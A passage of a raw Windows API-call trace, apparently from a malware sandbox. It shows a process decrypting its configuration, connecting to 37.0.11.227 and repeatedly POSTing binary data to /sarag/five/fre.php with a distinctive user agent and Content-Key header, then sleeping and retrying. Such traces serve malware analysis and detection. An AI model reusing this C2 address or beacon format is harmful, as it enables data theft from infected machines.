(HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0279.095] GetProcessHeap () returned 0x690000 [0279.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0279.096] send (s=0x8a4, buf=0x6ad508*, len=242, flags=0) returned 242 [0279.099] send (s=0x8a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0279.099] GetProcessHeap () returned 0x690000 [0279.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0279.099] recv (in: s=0x8a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0279.182] GetProcessHeap () returned 0x690000 [0279.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0279.182] GetProcessHeap () returned 0x690000 [0279.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0279.183] GetProcessHeap () returned 0x690000 [0279.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0279.184] GetProcessHeap () returned 0x690000 [0279.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0279.184] closesocket (s=0x8a4) returned 0 [0279.184] GetProcessHeap () returned 0x690000 [0279.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0279.184] GetProcessHeap () returned 0x690000 [0279.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0279.185] GetProcessHeap () returned 0x690000 [0279.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0279.185] GetProcessHeap () returned 0x690000 [0279.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0279.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1664) returned 0x8a4 [0279.187] Sleep (dwMilliseconds=0xea60) [0279.221] GetProcessHeap () returned 0x690000 [0279.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0279.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.222] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0279.236] GetProcessHeap () returned 0x690000 [0279.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0279.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.237] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0279.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.238] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.239] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.239] GetProcessHeap () returned 0x690000 [0279.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0279.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.241] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0279.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.242] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0279.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.244] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0279.244] GetProcessHeap () returned 0x690000 [0279.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0279.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.245] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.248] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.248] GetProcessHeap () returned 0x690000 [0279.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0279.248] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.248] GetProcessHeap () returned 0x690000 [0279.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0279.249] GetProcessHeap () returned 0x690000 [0279.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0279.249] GetProcessHeap () returned 0x690000 [0279.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0279.249] GetProcessHeap () returned 0x690000 [0279.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0279.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0279.266] GetProcessHeap () returned 0x690000 [0279.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0279.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.266] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0279.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.267] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.269] GetProcessHeap () returned 0x690000 [0279.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0279.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.270] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0279.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.271] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0279.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.272] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0279.272] GetProcessHeap () returned 0x690000 [0279.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0279.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.273] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0279.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.274] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0279.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.276] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0279.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.277] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0279.277] GetProcessHeap () returned 0x690000 [0279.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0279.277] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0279.277] GetProcessHeap () returned 0x690000 [0279.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0279.277] socket (af=2, type=1, protocol=6) returned 0x8a8 [0279.278] connect (s=0x8a8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0279.350] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0279.350] GetProcessHeap () returned 0x690000 [0279.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0279.350] GetProcessHeap () returned 0x690000 [0279.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0279.351] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0279.353] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.353] GetProcessHeap () returned 0x690000 [0279.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0279.353] GetProcessHeap () returned 0x690000 [0279.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0279.354] GetProcessHeap () returned 0x690000 [0279.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0279.354] GetProcessHeap () returned 0x690000 [0279.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0279.355] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0279.356] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.356] GetProcessHeap () returned 0x690000 [0279.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0279.356] GetProcessHeap () returned 0x690000 [0279.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0279.356] send (s=0x8a8, buf=0x6ad508*, len=242, flags=0) returned 242 [0279.357] send (s=0x8a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0279.357] GetProcessHeap () returned 0x690000 [0279.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0279.357] recv (in: s=0x8a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0279.512] GetProcessHeap () returned 0x690000 [0279.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0279.512] GetProcessHeap () returned 0x690000 [0279.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0279.513] GetProcessHeap () returned 0x690000 [0279.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0279.515] GetProcessHeap () returned 0x690000 [0279.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0279.515] closesocket (s=0x8a8) returned 0 [0279.516] GetProcessHeap () returned 0x690000 [0279.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0279.516] GetProcessHeap () returned 0x690000 [0279.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0279.517] GetProcessHeap () returned 0x690000 [0279.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0279.517] GetProcessHeap () returned 0x690000 [0279.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0279.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1668) returned 0x8a8 [0279.665] Sleep (dwMilliseconds=0xea60) [0279.670] GetProcessHeap () returned 0x690000 [0279.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0279.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.671] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0279.993] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0280.045] GetProcessHeap () returned 0x690000 [0280.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0280.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.046] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0280.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.077] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.078] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.079] GetProcessHeap () returned 0x690000 [0280.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0280.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.080] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0280.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.091] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0280.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.092] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0280.092] GetProcessHeap () returned 0x690000 [0280.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.093] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.097] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.098] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.099] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.099] GetProcessHeap () returned 0x690000 [0280.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0280.099] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.099] GetProcessHeap () returned 0x690000 [0280.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0280.100] GetProcessHeap () returned 0x690000 [0280.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.100] GetProcessHeap () returned 0x690000 [0280.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0280.101] GetProcessHeap () returned 0x690000 [0280.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0280.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.102] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0280.115] GetProcessHeap () returned 0x690000 [0280.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0280.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.116] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0280.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.117] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.118] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.118] GetProcessHeap () returned 0x690000 [0280.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0280.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.120] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0280.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.121] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0280.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.122] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0280.122] GetProcessHeap () returned 0x690000 [0280.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.123] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0280.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0280.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0280.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.134] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0280.134] GetProcessHeap () returned 0x690000 [0280.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0280.134] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0280.134] GetProcessHeap () returned 0x690000 [0280.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0280.134] socket (af=2, type=1, protocol=6) returned 0x8ac [0280.136] connect (s=0x8ac, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0280.166] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0280.166] GetProcessHeap () returned 0x690000 [0280.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0280.167] GetProcessHeap () returned 0x690000 [0280.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0280.167] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.168] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.168] GetProcessHeap () returned 0x690000 [0280.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0280.168] GetProcessHeap () returned 0x690000 [0280.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.169] GetProcessHeap () returned 0x690000 [0280.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0280.169] GetProcessHeap () returned 0x690000 [0280.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0280.170] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.171] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.171] GetProcessHeap () returned 0x690000 [0280.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0280.171] GetProcessHeap () returned 0x690000 [0280.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.172] send (s=0x8ac, buf=0x6ad508*, len=242, flags=0) returned 242 [0280.172] send (s=0x8ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0280.172] GetProcessHeap () returned 0x690000 [0280.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0280.173] recv (in: s=0x8ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0280.249] GetProcessHeap () returned 0x690000 [0280.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0280.250] GetProcessHeap () returned 0x690000 [0280.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0280.251] GetProcessHeap () returned 0x690000 [0280.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0280.251] GetProcessHeap () returned 0x690000 [0280.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0280.252] 